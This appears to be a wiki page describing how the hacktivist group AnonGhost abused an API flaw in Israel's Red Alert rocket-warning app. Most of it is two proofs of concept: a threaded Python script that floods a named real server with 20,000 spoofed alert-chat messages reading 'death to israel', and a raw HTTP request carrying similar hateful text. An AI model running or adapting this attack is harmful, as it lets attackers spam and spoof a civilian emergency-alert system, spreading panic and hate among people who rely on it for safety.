RedAlert
Jump to navigation
Jump to search
Hacktivist group AnonGhost hacked a Red Alert application that Israelis use to be alerted for when Hamas performs rocket fire attacks via an API vulnerability, allowing them to send red alert messages on mass to anyone and everyone who uses the app, allowing them to say anything they like.
Explanation of the Hack
POC 1:
import requests
import threading
import time
url = "http://54.214.248.70:80/redalert/and/api/chat.php"
headers = {
"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
"User-Agent": "Dalvik/2.1.0 (Linux; U; Android 13; M2101K7BG Build/TP1A.220624.014)",
"Host": "54.214.248.70",
"Connection": "Keep-Alive",
"Accept-Encoding": "gzip",
}
data = {
"msg": "death to israel",
"method": "sendmsg",
"time": "🇵🇸",
"hash": "f1f416dd17fb4668098a8b02c845021f",
"token": "fWIzje8JYuI:APA91bGbeHvcsQpsPBucVxgUZcUGIT8ZXBNCKGSNdHmxdI0BfXW-idB6qvFTLZhBBI3jmVdBawsmCSPhkeDD5g_JKz6n7Q3ohltrJOiKHOJl47Sv0417E70hbykh8lfhLvD9_GeTN9Me",
"ts": "1696713616907",
"username": "࿕",
}
num_threads = 500
num_requests = 20000
def send_request():
for _ in range(num_requests // num_threads):
response = requests.post(url, headers=headers, data=data)
print(response.text)
threads = []
for _ in range(num_threads):
thread = threading.Thread(target=send_request)
threads.append(thread)
thread.start()
for thread in threads:
thread.join()
POC 2:
POST /redalert/and/api/chat.php?msg=AnonGhost&method=sendmsg&time=7%3A13&hash=52bd01a926202bc0e5e7ba68270e4705&token=FUCKISRAEL&ts=1696720382270&username=AnonGhost&& HTTP/1.1 Host: 54.214.248.70 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Connection: close